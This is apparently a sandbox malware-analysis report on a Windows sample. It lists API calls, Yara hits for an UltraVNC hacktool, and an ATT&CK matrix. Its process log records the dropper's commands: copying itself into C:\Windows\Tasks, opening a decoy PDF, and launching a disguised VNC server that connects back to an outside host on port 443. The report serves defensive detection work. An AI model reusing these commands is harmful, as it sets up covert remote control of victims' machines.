                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,18_2_00007FF6DC0C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,18_2_00007FF6DC0EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,18_2_00007FF6DC17A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6DC0C5910
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6DC0EC210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6DC17A228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0C6060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,18_2_00007FF6DC0C6060
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                          Source: sync_browser.exe, 00000012.00000002.4546943962.000000000089E000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000002.2287519184.0000000000D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sync_browser.exe, 00000017.00000002.2287867607.00000000028A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end nodegraph_18-22741
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information queried: ProcessInformation
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6DC1847E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D26B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,18_2_00007FF6DC0D26B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC129BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,18_2_00007FF6DC129BC0
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC1847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF6DC1847E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC177220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF6DC177220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC1847E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00007FF6DC1847E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 23_2_00007FF6DC177220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00007FF6DC177220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe23_2_00007FF6DC129BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D3D50 GetVersionExA,GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,18_2_00007FF6DC0D3D50
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,18_2_00007FF6DC0D74C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0E4D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,18_2_00007FF6DC0E4D7E
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmdJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exeJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC0D7B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,18_2_00007FF6DC0D7B90
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                          Source: WPSela.LSZr7V.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                          Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.drBinary or memory string: Program Manager
                          Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.drBinary or memory string: Shell_TrayWnd
                          Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.drBinary or memory string: Progman
                          Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC129EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,18_2_00007FF6DC129EF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 18_2_00007FF6DC17DF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_00007FF6DC17DF80
                          Source: C:\Users\user\Desktop\7q551ugrWe.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                          Stealing of Sensitive Information

                          barindex
                          Yara detected UltraVNC Hacktool
                          Source: Yara matchFile source: 23.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2276683914.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7q551ugrWe.exe PID: 6984, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 7736, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 6084, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected UltraVNC Hacktool
                          Source: Yara matchFile source: 23.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 18.2.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 23.0.sync_browser.exe.7ff6dc0c0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000017.00000000.2276683914.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 7q551ugrWe.exe PID: 6984, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 7736, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 6084, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\WPSela.LSZr7V, type: DROPPED
                          Contains VNC / remote desktop functionality (version string found)
                          Source: sync_browser.exe, 00000012.00000003.2401438900.000000000223A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          Source: sync_browser.exe, 00000012.00000002.4547061075.0000000002230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts                          		1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          Exploitation for Privilege Escalation                          		1
                          Disable or Modify Tools                          		121
                          Input Capture                          		2
                          System Time Discovery                          		1
                          Remote Desktop Protocol                          		1
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts2
                          Native API                          		1
                          Valid Accounts                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory1
                          Account Discovery                          		Remote Desktop Protocol1
                          Screen Capture                          		12
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		11
                          Windows Service                          		1
                          Valid Accounts                          		2
                          Obfuscated Files or Information                          		Security Account Manager1
                          System Service Discovery                          		SMB/Windows Admin Shares121
                          Input Capture                          		1
                          Remote Access Software                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job                          		1
                          Scheduled Task/Job                          		11
                          Access Token Manipulation                          		1
                          Timestomp                          		NTDS4
                          File and Directory Discovery                          		Distributed Component Object Model3
                          Clipboard Data                          		1
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          Service Execution                          		1
                          Bootkit                          		11
                          Windows Service                          		1
                          DLL Side-Loading                          		LSA Secrets26
                          System Information Discovery                          		SSHKeylogging2
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                          Process Injection                          		231
                          Masquerading                          		Cached Domain Credentials31
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job                          		1
                          Valid Accounts                          		DCSync1
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Virtualization/Sandbox Evasion                          		Proc Filesystem3
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Access Token Manipulation                          		/etc/passwd and /etc/shadow11
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                          Process Injection                          		Network Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                          Bootkit                          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
